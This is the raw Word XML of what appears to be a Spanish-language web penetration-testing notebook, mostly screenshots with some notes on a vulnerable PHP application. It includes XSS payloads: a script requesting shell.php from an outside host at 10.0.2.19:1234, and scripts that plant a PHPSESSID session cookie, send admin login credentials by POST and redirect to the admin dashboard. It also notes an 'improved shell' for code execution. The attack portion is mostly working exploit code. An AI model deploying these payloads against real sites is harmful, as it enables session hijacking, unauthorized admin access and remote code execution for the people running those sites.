    <w:p w14:paraId="1E9C59B1" w14:textId="77777777" w:rsidR="00E07F19" w:rsidRPr="004A1F56" w:rsidRDefault="00E07F19"/>
    <w:p w14:paraId="3F104306" w14:textId="77777777" w:rsidR="004F4306" w:rsidRPr="004A1F56" w:rsidRDefault="004F4306"/>
    <w:p w14:paraId="7C1588FE" w14:textId="77777777" w:rsidR="004F4306" w:rsidRPr="004A1F56" w:rsidRDefault="004F4306"/>
    <w:p w14:paraId="5BDFEC1E" w14:textId="77777777" w:rsidR="004F4306" w:rsidRPr="004A1F56" w:rsidRDefault="004F4306"/>
    <w:p w14:paraId="0CE2B934" w14:textId="77777777" w:rsidR="004F4306" w:rsidRPr="004A1F56" w:rsidRDefault="004F4306"/>
    <w:p w14:paraId="0642F305" w14:textId="77777777" w:rsidR="004F4306" w:rsidRPr="004A1F56" w:rsidRDefault="004F4306"/>
    <w:p w14:paraId="126967E8" w14:textId="77777777" w:rsidR="004F4306" w:rsidRPr="004A1F56" w:rsidRDefault="004F4306"/>
    <w:p w14:paraId="24A88C1E" w14:textId="77777777" w:rsidR="004F4306" w:rsidRPr="004A1F56" w:rsidRDefault="004F4306"/>
    <w:p w14:paraId="2CE2233C" w14:textId="77777777" w:rsidR="004F4306" w:rsidRPr="004A1F56" w:rsidRDefault="004F4306"/>
    <w:p w14:paraId="7A9180DB" w14:textId="77777777" w:rsidR="004F4306" w:rsidRPr="004A1F56" w:rsidRDefault="004F4306"/>
    <w:p w14:paraId="6CC997A8" w14:textId="77777777" w:rsidR="004F4306" w:rsidRPr="004A1F56" w:rsidRDefault="004F4306"/>
    <w:p w14:paraId="094DE42B" w14:textId="77777777" w:rsidR="004F4306" w:rsidRPr="004A1F56" w:rsidRDefault="004F4306"/>
    <w:p w14:paraId="32AEB4E3" w14:textId="77777777" w:rsidR="004F4306" w:rsidRPr="004A1F56" w:rsidRDefault="004F4306"/>
    <w:p w14:paraId="7F95F95C" w14:textId="77777777" w:rsidR="004F4306" w:rsidRPr="004A1F56" w:rsidRDefault="004F4306"/>
    <w:p w14:paraId="1C73390B" w14:textId="77777777" w:rsidR="004F4306" w:rsidRPr="004A1F56" w:rsidRDefault="004F4306"/>
    <w:p w14:paraId="023A058D" w14:textId="77777777" w:rsidR="004F4306" w:rsidRPr="004A1F56" w:rsidRDefault="004F4306"/>
    <w:p w14:paraId="4C42748A" w14:textId="77777777" w:rsidR="004F4306" w:rsidRPr="004A1F56" w:rsidRDefault="004F4306"/>
    <w:p w14:paraId="6A0D3E34" w14:textId="77777777" w:rsidR="004F4306" w:rsidRPr="004A1F56" w:rsidRDefault="004F4306"/>
    <w:p w14:paraId="539E6664" w14:textId="77777777" w:rsidR="004F4306" w:rsidRPr="004A1F56" w:rsidRDefault="004F4306"/>
    <w:p w14:paraId="4B35398C" w14:textId="77777777" w:rsidR="004F4306" w:rsidRPr="004A1F56" w:rsidRDefault="004F4306"/>
    <w:p w14:paraId="5C665713" w14:textId="77777777" w:rsidR="004F4306" w:rsidRPr="004A1F56" w:rsidRDefault="004F4306"/>
    <w:p w14:paraId="4ADAE14B" w14:textId="77777777" w:rsidR="004F4306" w:rsidRPr="004A1F56" w:rsidRDefault="004F4306"/>
    <w:p w14:paraId="4593863F" w14:textId="77777777" w:rsidR="004F4306" w:rsidRPr="004A1F56" w:rsidRDefault="004F4306"/>
    <w:p w14:paraId="473BFB04" w14:textId="77777777" w:rsidR="004F4306" w:rsidRPr="004A1F56" w:rsidRDefault="004F4306"/>
    <w:p w14:paraId="6A70DD89" w14:textId="77777777" w:rsidR="004F4306" w:rsidRPr="004A1F56" w:rsidRDefault="004F4306"/>
    <w:p w14:paraId="368490E9" w14:textId="77777777" w:rsidR="004F4306" w:rsidRPr="004A1F56" w:rsidRDefault="004F4306"/>
    <w:p w14:paraId="2C674835" w14:textId="77777777" w:rsidR="004F4306" w:rsidRPr="004A1F56" w:rsidRDefault="004F4306"/>
    <w:p w14:paraId="5A0313CA" w14:textId="77777777" w:rsidR="004F4306" w:rsidRPr="004A1F56" w:rsidRDefault="004F4306"/>
    <w:p w14:paraId="02066523" w14:textId="77777777" w:rsidR="004F4306" w:rsidRPr="004A1F56" w:rsidRDefault="004F4306"/>
    <w:p w14:paraId="45661D1D" w14:textId="77777777" w:rsidR="004F4306" w:rsidRPr="004A1F56" w:rsidRDefault="004F4306"/>
    <w:p w14:paraId="002E5121" w14:textId="77777777" w:rsidR="004F4306" w:rsidRPr="004A1F56" w:rsidRDefault="004F4306"/>
    <w:p w14:paraId="55BCDF0E" w14:textId="77777777" w:rsidR="004F4306" w:rsidRPr="004A1F56" w:rsidRDefault="004F4306"/>
    <w:p w14:paraId="4D915710" w14:textId="77777777" w:rsidR="004F4306" w:rsidRPr="004A1F56" w:rsidRDefault="004F4306"/>
    <w:p w14:paraId="5205B775" w14:textId="77777777" w:rsidR="004F4306" w:rsidRPr="004A1F56" w:rsidRDefault="004F4306"/>
    <w:p w14:paraId="2107B678" w14:textId="77777777" w:rsidR="004F4306" w:rsidRPr="004A1F56" w:rsidRDefault="004F4306"/>
    <w:p w14:paraId="6EEE2DF3" w14:textId="77777777" w:rsidR="004F4306" w:rsidRPr="004A1F56" w:rsidRDefault="004F4306"/>
    <w:p w14:paraId="511544F4" w14:textId="77777777" w:rsidR="004F4306" w:rsidRPr="004A1F56" w:rsidRDefault="004F4306"/>
    <w:p w14:paraId="6A9B4784" w14:textId="77777777" w:rsidR="004F4306" w:rsidRPr="004A1F56" w:rsidRDefault="004F4306"/>
    <w:p w14:paraId="23BF1A2E" w14:textId="77777777" w:rsidR="004F4306" w:rsidRPr="004A1F56" w:rsidRDefault="004F4306"/>
    <w:p w14:paraId="69A326B7" w14:textId="77777777" w:rsidR="004F4306" w:rsidRPr="004A1F56" w:rsidRDefault="004F4306"/>
    <w:p w14:paraId="358F6E0F" w14:textId="77777777" w:rsidR="004F4306" w:rsidRPr="004A1F56" w:rsidRDefault="004F4306"/>
    <w:p w14:paraId="30D85EA9" w14:textId="77777777" w:rsidR="004F4306" w:rsidRPr="004A1F56" w:rsidRDefault="004F4306"/>
    <w:p w14:paraId="497ED868" w14:textId="1263A7C1" w:rsidR="0085072B" w:rsidRDefault="0085072B">
      <w:r>
        <w:t>EJECUTO SCRIPT DE PYTHON BUSCANDO ALGO EN LAS PRIMERAS ID DE LA WEB Y NADA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA9AD68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&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416E1C41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// Crear un objeto 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XMLHttpRequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="383EBE05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var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xhr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= new </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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XMLHttpRequest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(</w:t>
      </w:r>
      <w:proofErr w:type="gram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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0CA43A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</w:p>
    <w:p w14:paraId="320519D1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// Configurar la solicitud HTTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BC2B1D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  <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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xhr.open</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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('GET', 'http://10.0.2.19:1234/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shell.php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', true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CEB640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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5632905D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</w:t>
      </w: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// Enviar la solicitud</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD914D4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  <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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xhr.send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B40B09" w14:textId="5F00E912" w:rsidR="009D59A6" w:rsidRDefault="009D59A6" w:rsidP="009D59A6"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&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D07F0B1" w14:textId="77777777" w:rsidR="009D59A6" w:rsidRDefault="009D59A6"/>
    <w:p w14:paraId="43344B37" w14:textId="7A183075" w:rsidR="0085072B" w:rsidRDefault="00422376">
      <w:r w:rsidRPr="00422376">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C0AE8A9" wp14:editId="0F4EC646">
            <wp:extent cx="5400040" cy="3460750"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="1308055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5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48F" w14:textId="2320FEBC" w:rsidR="002B6BFB" w:rsidRDefault="002B6BFB">
      <w:r>
        <w:t xml:space="preserve">SCRIPT MEJORADO CON MAS FUNCIONES QUE PERMITAN LA EJECUCION DE </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>CODIGO ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Y UN SHELL YAB MEJORADO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E14BCE1" w14:textId="3D693DF1" w:rsidR="002B6BFB" w:rsidRDefault="002B6BFB">
      <w:r w:rsidRPr="002B6BFB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="097A23B1" wp14:editId="42360093">
            <wp:extent cx="5400040" cy="3701415"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="319860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0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78CE" w14:textId="25297971" w:rsidR="002B6BFB" w:rsidRDefault="00191C16">
      <w:r>
        <w:t>SHELL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCFD0F3" w14:textId="171B37A7" w:rsidR="00191C16" w:rsidRDefault="00191C16">
      <w:r w:rsidRPr="00191C16">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A32CD6D" wp14:editId="536D2C2F">
            <wp:extent cx="3674225" cy="1738946"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="344661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1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7640" cy="17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26A" w14:textId="77777777" w:rsidR="002B6BFB" w:rsidRDefault="002B6BFB"/>
    <w:p w14:paraId="43649B41" w14:textId="5594769C" w:rsidR="002A7C68" w:rsidRDefault="00C44E7B">
      <w:r w:rsidRPr="00C44E7B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B971703" wp14:editId="26DB3345">
            <wp:extent cx="5400040" cy="3272790"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="706521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1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1CF4" w14:textId="200B15F1" w:rsidR="003A5007" w:rsidRDefault="003A5007">
      <w:r w:rsidRPr="003A5007">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64558ECC" wp14:editId="489A451B">
            <wp:extent cx="5400040" cy="2644775"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="42312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28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163D" w14:textId="77777777" w:rsidR="003A5007" w:rsidRDefault="003A5007"/>
    <w:p w14:paraId="48D44AAB" w14:textId="3B6A9891" w:rsidR="00A55D60" w:rsidRDefault="00A55D60">
      <w:r w:rsidRPr="00A55D60">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="036BCCF8" wp14:editId="24E46EAE">
            <wp:extent cx="5400040" cy="2823210"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="497210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104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8BD4" w14:textId="73BF45E2" w:rsidR="00D37503" w:rsidRDefault="00C43BE3">
      <w:r w:rsidRPr="00C43BE3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0BE8D981" wp14:editId="7EECDAA3">
            <wp:extent cx="4848902" cy="4639322"/>
            <wp:effectExtent l="0" t="0" r="8890" b="8890"/>
            <wp:docPr id="51105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56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57AF" w14:textId="5AE52F29" w:rsidR="00D37503" w:rsidRDefault="00D37503"/>
    <w:p w14:paraId="52B03853" w14:textId="77777777" w:rsidR="00650C0F" w:rsidRDefault="00650C0F"/>
    <w:p w14:paraId="2620E929" w14:textId="63ED3735" w:rsidR="00E2520A" w:rsidRDefault="00E2520A">
      <w:r w:rsidRPr="00E2520A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E6BDA53" wp14:editId="5FA7D5EB">
            <wp:extent cx="5400040" cy="5285105"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1266355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5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95C3" w14:textId="77777777" w:rsidR="00E2520A" w:rsidRDefault="00E2520A"/>
    <w:p w14:paraId="5F5E4034" w14:textId="0B5F8490" w:rsidR="00E2520A" w:rsidRDefault="00E2520A">
      <w:r w:rsidRPr="00E2520A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A6D4766" wp14:editId="4832CACE">
            <wp:extent cx="5400040" cy="2274570"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2015326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6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5208" w14:textId="77777777" w:rsidR="00412778" w:rsidRDefault="00412778"/>
    <w:p w14:paraId="6F184121" w14:textId="77777777" w:rsidR="004E3BFC" w:rsidRDefault="004E3BFC"/>
    <w:p w14:paraId="2ED10ACB" w14:textId="776B6BEC" w:rsidR="00412778" w:rsidRDefault="00565F82">
      <w:r w:rsidRPr="00565F82">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67AF196F" wp14:editId="59CC8FA2">
            <wp:extent cx="5400040" cy="3260725"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="29327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41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2B8F" w14:textId="77777777" w:rsidR="004E3BFC" w:rsidRPr="004E3BFC" w:rsidRDefault="004E3BFC" w:rsidP="004E3B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Análisis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2640DCD3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No Acceso a robots.txt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La aplicación web no tiene un archivo </w:t>
      </w:r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robots.txt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accesible, lo que indica que no hay restricciones explícitas para los motores de búsqueda.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21645642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No Anti-CSRF Tokens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 aplicación web no utiliza tokens CSRF para protegerse contra ataques CSRF.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214DE005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Vulnerabilidad a CSRF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 aplicación web es vulnerable a ataques CSRF, lo que significa que un atacante podría forzar a un usuario a realizar acciones no deseadas en la aplicación web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4397E294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No CSP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 aplicación web no utiliza Content Security Policy (CSP), lo que la hace más vulnerable a ataques XSS y de inyección de datos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DC1B89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Información de Servidor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El servidor está revelando información sobre su configuración a través de los encabezados HTTP </w:t>
      </w:r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X-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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Powered</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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By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y </w:t>
      </w:r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Server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, lo que podría facilitar la identificación de vulnerabilidades en el servidor o la aplicación web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B193374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User </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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Agent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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Fuzzer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Tienes activo un User </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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Agent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Fuzzer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lo que te permite probar la aplicación web con diferentes User </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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Agents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para ver cómo responde.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B539F22" w14:textId="1AE0C38D" w:rsidR="004E3BFC" w:rsidRDefault="004E3BFC"/>
    <w:p w14:paraId="11F660CB" w14:textId="05269505" w:rsidR="009235B6" w:rsidRDefault="009235B6">
      <w:r w:rsidRPr="009235B6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="342F8B74" wp14:editId="1F05A22E">
            <wp:extent cx="4763165" cy="4667901"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="34179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76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C124" w14:textId="7C2F1628" w:rsidR="009235B6" w:rsidRDefault="008E07EF">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Captira</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>neviado</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> un script de prueba</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7047520F" w14:textId="6B71FFB3" w:rsidR="008E07EF" w:rsidRDefault="008E07EF">
      <w:r w:rsidRPr="008E07EF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F6B6633" wp14:editId="5959D92D">
            <wp:extent cx="5400040" cy="1930400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="457754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49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6F9F" w14:textId="77777777" w:rsidR="008E07EF" w:rsidRDefault="008E07EF"/>
    <w:p w14:paraId="0339A34B" w14:textId="7BFE0A0B" w:rsidR="008E07EF" w:rsidRDefault="008E07EF">
      <w:r>
        <w:t>La cookie es diferente a la del navegador</w:t>
      </w:r>
      <w:r w:rsidR="00F91DEA">
        <w:t>, cambiamos cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528B6D01" w14:textId="77777777" w:rsidR="00F91DEA" w:rsidRP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</w:pP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&lt;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div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&gt;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&lt;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script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&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E19B26" w14:textId="4CC976AC" w:rsidR="00F91DEA" w:rsidRP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</w:pP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 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/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document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.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd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=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"</w:t>
      </w:r>
      <w:r w:rsidRPr="00F91DEA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r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PHPSESSID=jj168ic8gkcngr0u4tmg6kt7v7; path=/"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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F09EE33" w14:textId="77777777" w:rsidR="00F91DEA" w:rsidRP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</w:pP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 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/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window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.location</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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.href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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=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"/admin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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login.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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"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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B03FBDB" w14:textId="77777777" w:rsid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&lt;/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script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&gt;&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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div</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1702FEEA" w14:textId="77777777" w:rsidR="00996B60" w:rsidRDefault="00996B60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</w:pPr>
    </w:p>
    <w:p w14:paraId="5D7F110D" w14:textId="745B369D" w:rsidR="00996B60" w:rsidRDefault="00996B60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Mejora de código, aprovechando </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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aun</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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mas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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vulnerabilidades XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517E3ABD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lastRenderedPageBreak/>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00996B60">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="B67352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t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A04889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</w:t>
      </w:r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t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00996B60">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="B67352"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>script</w:t>
      </w:r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t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0BB4D9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    // Establecer la cookie de sesión</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E258CB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document.cookie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 = "PHPSESSID=bpu0b846jkl6d6ih8f5vc79cb4; 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path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=/";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01946F46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</w:p>
    <w:p w14:paraId="367D90CB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// Intentar enviar una petición AJAX al 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endpoint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 de inicio de sesión</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2896B7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var 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= new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XMLHttpRequest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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522A96B0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xhr.open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("POST", "/admin/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login.php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", true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E3BE3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xhr.setRequestHeader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("Content-Type", "application/x-www-form-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urlencoded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");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0553D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</w:p>
    <w:p w14:paraId="296E55B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// Reemplaza 'admin' y 'password' con las credenciales que quieras probar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DB3BEE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var body = "username=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admin&amp;password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=password";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D96C2E5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</w:p>
    <w:p w14:paraId="7BBFB630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xhr.onreadystatechange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= function() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BD37F7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96B60">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="278BD3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>if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C312E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>this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.readyState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==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4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DC312E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>&amp;&amp;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96B60">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="DC312E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>this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.status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==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200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) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A18C131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 xml:space="preserve">// Si la petición es exitosa, redirigir al </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>dashboard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> de admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B8530F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window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.location</w:t>
      </w:r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.href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=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val="en-US" w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>"/admin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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val="en-US" w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>dashboard.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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val="en-US" w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>"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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045753A0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} else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252FC731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>// Si falla, posiblemente mostrar un mensaje o redirigir a otro lado</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F960C4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ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>console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.</w:t>
      </w:r>
      <w:r w:rsidRPr="00996B60">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="278BD3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>log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eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>"Fallo en el inicio de sesión automático"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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E02215C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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C69E51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    };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B43F5F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</w:p>
    <w:p w14:paraId="65F01752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xhr.send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(body);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BB8FA3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  &lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24823ACE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&lt;div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C73AE6D" w14:textId="77777777" w:rsidR="00996B60" w:rsidRPr="00F91DEA" w:rsidRDefault="00996B60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val="en-US" w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53441776" w14:textId="77777777" w:rsidR="00996B60" w:rsidRPr="00996B60" w:rsidRDefault="00996B60" w:rsidP="00996B60">
      <w:r w:rsidRPr="00996B60">
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00996B60">
        <w:t>div</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00996B60">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7644EC8B" w14:textId="77777777" w:rsidR="00996B60" w:rsidRPr="00996B60" w:rsidRDefault="00996B60" w:rsidP="00996B60">
      <w:r w:rsidRPr="00996B60">
        <w:t xml:space="preserve">  &lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D33992A" w14:textId="77777777" w:rsidR="00996B60" w:rsidRPr="00996B60" w:rsidRDefault="00996B60" w:rsidP="00996B60">
      <w:r w:rsidRPr="00996B60">
        <w:t xml:space="preserve">    // Establecer la cookie de sesión</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F87C616" w14:textId="77777777" w:rsidR="00996B60" w:rsidRPr="00996B60" w:rsidRDefault="00996B60" w:rsidP="00996B60">
      <w:r w:rsidRPr="00996B60">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00996B60">
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00996B60">
        <w:t xml:space="preserve"> = "PHPSESSID=bpu0b846jkl6d6ih8f5vc79cb4; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00996B60">
        <w:t>path</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00996B60">
        <w:t>=/";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C70E10" w14:textId="77777777" w:rsidR="00996B60" w:rsidRPr="00996B60" w:rsidRDefault="00996B60" w:rsidP="00996B60"/>
    <w:p w14:paraId="3D734E02" w14:textId="77777777" w:rsidR="00996B60" w:rsidRPr="00996B60" w:rsidRDefault="00996B60" w:rsidP="00996B60">
      <w:r w:rsidRPr="00996B60">
        <w:t xml:space="preserve">    // Verificar si ya estamos </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00996B60">
        <w:t>logueados</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
